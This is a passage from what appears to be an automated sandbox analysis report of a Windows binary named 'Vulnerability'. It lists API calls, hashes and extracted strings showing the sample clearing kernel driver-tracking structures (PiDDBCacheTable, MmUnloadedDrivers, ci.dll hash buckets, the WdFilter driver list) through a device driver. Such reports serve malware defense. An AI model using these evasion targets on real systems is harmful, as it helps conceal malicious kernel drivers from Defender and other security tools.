                                                    • Opcode Fuzzy Hash: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
                                                    • Instruction Fuzzy Hash: F2312C73665A4281EBA09F15E54436CE3A4FB54FA8F844231CE5C977A4DF3ED4A6C320
                                                    APIs
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
                                                      • Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
                                                      • Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
                                                      • Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
                                                      • Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7F38
                                                      • Part of subcall function 00007FF7738E6D90: DeviceIoControl.KERNEL32 ref: 00007FF7738E6E35
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738E8038
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7738E8044
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E8054
                                                      • Part of subcall function 00007FF7738E6E90: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F50
                                                      • Part of subcall function 00007FF7738E6E90: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F90
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E808F
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E810B
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E814E
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E817D
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E8970
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$Virtual$??6?$basic_ostream@_?good@ios_base@std@@ControlDeviceFreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@AllocOsfx@?$basic_ostream@_V12@V21@@Vios_base@1@memmove
                                                    • String ID: 0$PAGE$[!] g_KernelHashBucketList looks empty!$[+] Found In g_KernelHashBucketList: $[+] g_HashCacheLock Locked$[+] g_KernelHashBucketList Cleaned$[+] g_KernelHashBucketList Found 0x$[-] Can't Find ci.dll module address$[-] Can't Find g_HashCache relative address$[-] Can't Find g_HashCacheLock$[-] Can't Find g_KernelHashBucketList$[-] Can't lock g_HashCacheLock$[-] Failed to clear g_KernelHashBucketList entry pool!$[-] Failed to read first g_KernelHashBucketList entry!$[-] Failed to read g_KernelHashBucketList entry text len!$[-] Failed to read g_KernelHashBucketList entry text ptr!$[-] Failed to read g_KernelHashBucketList entry text!$[-] Failed to read g_KernelHashBucketList next entry ptr!$[-] Failed to read g_KernelHashBucketList next entry!$[-] Failed to release g_KernelHashBucketList lock!$[-] Failed to write g_KernelHashBucketList prev entry ptr!$ci.dll$xxx$xxx????x?xxxxxxx
                                                    • API String ID: 3205709563-1878664939
                                                    • Opcode ID: 045a49bf4181b40a484816a917c201af6f4cd2614e916e1984f18802fd76dbcb
                                                    • Instruction ID: 83c652b78d00492cdeaf4f274503b8934bb5ca066be0d256380d6813a0551b17
                                                    • Opcode Fuzzy Hash: 045a49bf4181b40a484816a917c201af6f4cd2614e916e1984f18802fd76dbcb
                                                    • Instruction Fuzzy Hash: 1D627D23F78B4285EB80AB61E4402ADE3A1AB58B84F904235DE5D37799DF3ED565C330

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 942 7ff7738e72b0-7ff7738e7374 call 7ff7738e7c70 call 7ff7738e7b00 call 7ff7738e7c70 call 7ff7738e7b00 951 7ff7738e741a 942->951 952 7ff7738e737a-7ff7738e73c5 call 7ff7738e7c70 call 7ff7738e7b00 942->952 953 7ff7738e741e-7ff7738e742f 951->953 965 7ff7738e73c7 952->965 966 7ff7738e73ea-7ff7738e7418 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 952->966 955 7ff7738e7431-7ff7738e7438 953->955 956 7ff7738e743a-7ff7738e74fc call 7ff7738ea7c0 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff7738ea7c0 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff7738e6d90 * 2 call 7ff7738e6e90 953->956 958 7ff7738e73ce-7ff7738e73e5 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 955->958 980 7ff7738e74fe 956->980 981 7ff7738e750a-7ff7738e754c call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff7738e40c0 call 7ff7738e70e0 956->981 970 7ff7738e7ad0-7ff7738e7afc call 7ff7738f3fc0 958->970 965->958 966->953 980->981 988 7ff7738e754e-7ff7738e7555 981->988 989 7ff7738e755a-7ff7738e756b 981->989 990 7ff7738e7a64-7ff7738e7a80 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 988->990 991 7ff7738e7570-7ff7738e75d3 DeviceIoControl 989->991 997 7ff7738e7a83 call 7ff7738e6fc0 990->997 993 7ff7738e7a5d 991->993 994 7ff7738e75d9-7ff7738e75e6 991->994 993->990 994->991 996 7ff7738e75e8-7ff7738e75f5 994->996 998 7ff7738e7600-7ff7738e7663 DeviceIoControl 996->998 999 7ff7738e7a88 997->999 1000 7ff7738e7a54-7ff7738e7a5b 998->1000 1001 7ff7738e7669-7ff7738e7676 998->1001 1003 7ff7738e7a8a-7ff7738e7a92 999->1003 1000->990 1001->998 1002 7ff7738e7678-7ff7738e76ce call 7ff7738ea7c0 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1001->1002 1010 7ff7738e76d0-7ff7738e772b DeviceIoControl 1002->1010 1005 7ff7738e7a94-7ff7738e7aaa 1003->1005 1006 7ff7738e7acd 1003->1006 1008 7ff7738e7aac-7ff7738e7abf 1005->1008 1009 7ff7738e7ac8 call 7ff7738f3fe0 1005->1009 1006->970 1008->1009 1011 7ff7738e7ac1-7ff7738e7ac7 _invalid_parameter_noinfo_noreturn 1008->1011 1009->1006 1013 7ff7738e7731-7ff7738e773e 1010->1013 1014 7ff7738e7a4b-7ff7738e7a52 1010->1014 1011->1009 1013->1010 1015 7ff7738e7740-7ff7738e7756 1013->1015 1014->990 1016 7ff7738e7760-7ff7738e77bb DeviceIoControl 1015->1016 1017 7ff7738e7a42-7ff7738e7a49 1016->1017 1018 7ff7738e77c1-7ff7738e77ce 1016->1018 1017->990 1018->1016 1019 7ff7738e77d0-7ff7738e77d3 1018->1019 1020 7ff7738e78d7-7ff7738e78de 1019->1020 1021 7ff7738e77d9-7ff7738e77f3 1019->1021 1020->990 1022 7ff7738e78aa-7ff7738e78b2 1021->1022 1023 7ff7738e77f9-7ff7738e780c call 7ff7738f4090 1021->1023 1024 7ff7738e78b4-7ff7738e78d1 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1022->1024 1025 7ff7738e78e3-7ff7738e78eb 1022->1025 1023->1022 1032 7ff7738e7812-7ff7738e783c call 7ff7738ec9f0 1023->1032 1024->1020 1029 7ff7738e78ef call 7ff7738ec360 1025->1029 1030 7ff7738e78f4-7ff7738e78f6 1029->1030 1030->1020 1033 7ff7738e78f8-7ff7738e78fc 1030->1033 1037 7ff7738e7843 call 7ff7738e6440 1032->1037 1033->1020 1035 7ff7738e78fe-7ff7738e790c 1033->1035 1038 7ff7738e7910-7ff7738e7976 DeviceIoControl 1035->1038 1039 7ff7738e7848-7ff7738e7857 1037->1039 1040 7ff7738e7978-7ff7738e7985 1038->1040 1041 7ff7738e7987-7ff7738e798c 1038->1041 1042 7ff7738e788d-7ff7738e78a5 call 7ff7738f4024 1039->1042 1043 7ff7738e7859-7ff7738e786a 1039->1043 1040->1038 1040->1041 1044 7ff7738e7a13 1041->1044 1045 7ff7738e7992-7ff7738e799a 1041->1045 1042->1022 1046 7ff7738e786c-7ff7738e787f 1043->1046 1047 7ff7738e7888 call 7ff7738f3fe0 1043->1047 1050 7ff7738e7a16 call 7ff7738e6fc0 1044->1050 1048 7ff7738e79a0-7ff7738e7a08 DeviceIoControl 1045->1048 1046->1047 1051 7ff7738e7881-7ff7738e7887 _invalid_parameter_noinfo_noreturn 1046->1051 1047->1042 1048->1044 1053 7ff7738e7a0a-7ff7738e7a11 1048->1053 1054 7ff7738e7a1b-7ff7738e7a40 call 7ff7738ea3c0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 1050->1054 1051->1047 1053->1044 1053->1048 1054->1003
                                                    APIs
                                                      • Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D
                                                      • Part of subcall function 00007FF7738E7C70: DeviceIoControl.KERNEL32 ref: 00007FF7738E7D33
                                                      • Part of subcall function 00007FF7738E7C70: memcmp.VCRUNTIME140 ref: 00007FF7738E7DB3
                                                      • Part of subcall function 00007FF7738E7C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7DF5
                                                      • Part of subcall function 00007FF7738E7B00: memset.VCRUNTIME140 ref: 00007FF7738E7B7F
                                                      • Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7C28
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E73DD
                                                      • Part of subcall function 00007FF7738E7C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7E8A
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7400
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738E7450
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7738E7460
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7470
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738E7493
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7738E74A3
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E74B3
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7520
                                                      • Part of subcall function 00007FF7738E45E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4291
                                                      • Part of subcall function 00007FF7738E70E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7204
                                                      • Part of subcall function 00007FF7738E70E0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7256
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E75CB
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E765B
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E7695
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E76A1
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E76B1
                                                      • Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E7A7A
                                                      • Part of subcall function 00007FF7738E6FC0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7080
                                                      • Part of subcall function 00007FF7738E6FC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E70C0
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E7AC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@_$_invalid_parameter_noinfo_noreturn$ControlDeviceV21@@Vios_base@1@$?good@ios_base@std@@V01@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@memcmpmemset
                                                    • String ID: 0$PAGE$RtlDeleteElementGenericTableAvl$[!] Failed to find RtlDeleteElementGenericTableAvl$[+] Found Table Entry = 0x$[+] PiDDBCacheTable Cleaned$[+] PiDDBCacheTable Ptr 0x$[+] PiDDBLock Locked$[+] PiDDBLock Ptr 0x$[+] PiDDBLock found with second pattern$[-] Can't delete from PiDDBCacheTable$[-] Can't get next entry$[-] Can't get prev entry$[-] Can't lock PiDDBCacheTable$[-] Can't set next entry$[-] Can't set prev entry$[-] Not found in cache$[-] Warning PiDDBCacheTable not found$[-] Warning PiDDBLock not found$xxx????xxxxx????xxx????x????x$xxxxxx$xxxxxx????xxxxx????xxx????xxxxx????x????xx?x
                                                    • API String ID: 239703443-2336041386
                                                    • Opcode ID: 47de42b5c40e8cd5d83652023a43dc839ef7cbf787f481b3bac40278a2451f8a
                                                    • Instruction ID: 909196677cee11f524dd4b6088529a27ef509d769ea64cdce95be2c4ae204e30
                                                    • Opcode Fuzzy Hash: 47de42b5c40e8cd5d83652023a43dc839ef7cbf787f481b3bac40278a2451f8a
                                                    • Instruction Fuzzy Hash: 19324C63E78B4395EB80EB61E8401A9F3A1AB54788F804236ED4D27758DF3ED569C730
                                                    APIs
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
                                                      • Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
                                                      • Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
                                                      • Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
                                                      • Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E50B2
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E50E0
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5145
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5269
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E5304
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E53CB
                                                    • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E541A
                                                      • Part of subcall function 00007FF7738E5E00: DeviceIoControl.KERNEL32 ref: 00007FF7738E5E9B
                                                    • wcsstr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E544F
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E54BA
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E554A
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E55A4
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E5633
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E56D4
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E5753
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E57DB
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E5863
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738E58EB
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E592C
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7738E5970
                                                      • Part of subcall function 00007FF7738EAA30: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA6F
                                                      • Part of subcall function 00007FF7738EAA30: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$ControlDevice$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$Virtual$FreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$AllocHandleModulememmovememsetwcsstr
                                                    • String ID: 0$PAGE$WdFilter.sys$[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod$[!] Failed to find WdFilter MpFreeDriverInfoEx$[!] Failed to find WdFilter RuntimeDriversCount$[!] Failed to find WdFilter RuntimeDriversList$[!] Failed to remove from RuntimeDriversArray$[+] Found WdFilter MpFreeDriverInfoEx with second pattern$[+] WdFilter.sys not loaded, clear skipped$[+] WdFilterDriverList Cleaned: $xx????xxx$xxx????xx$xxx?x?xx???????????x$xxx?xx?x???????????x
                                                    • API String ID: 3544830047-4286004192
                                                    • Opcode ID: d81fbafa94d609a4140f4b32611b6c5fb154e0ffdcaa8da99f44757a7aaf20a5
                                                    • Instruction ID: 651aa57d894949ea67e222c72a6a62799cf5f7e831e36f7032326e9d42cd770e
                                                    • Opcode Fuzzy Hash: d81fbafa94d609a4140f4b32611b6c5fb154e0ffdcaa8da99f44757a7aaf20a5
                                                    • Instruction Fuzzy Hash: FB426E73B38B429AE740EB61E4502ADB3B5EB48788F904635DA4D27B58DF3DD265C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$ControlDevice$Virtual$??6?$basic_ostream@D@std@@@std@@FreeU?$char_traits@V01@@$InformationQuerySystem$AllocCurrentProcessmemset
                                                    • String ID: 0$[!] Failed to find device_object$[!] Failed to find driver name$[!] Failed to find driver_object$[!] Failed to find driver_section$[!] Failed to read driver name$[!] Failed to write driver name length$[+] MmUnloadedDrivers Cleaned:
                                                    • API String ID: 48251577-3329613743
                                                    • Opcode ID: 051810a0883f8684cf0231ec4c9613ca774b12292568e887c4856809f456f53f
                                                    • Instruction ID: ce768bbbbf60252da7c7154d03c1b03c91588a1f2f67162b7010475fcce04f53
                                                    • Opcode Fuzzy Hash: 051810a0883f8684cf0231ec4c9613ca774b12292568e887c4856809f456f53f
                                                    • Instruction Fuzzy Hash: FBF19C23B78B428AE7409B61E4402ACB3A4EB49B88F944635DE4D37B54DF3ED525C330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
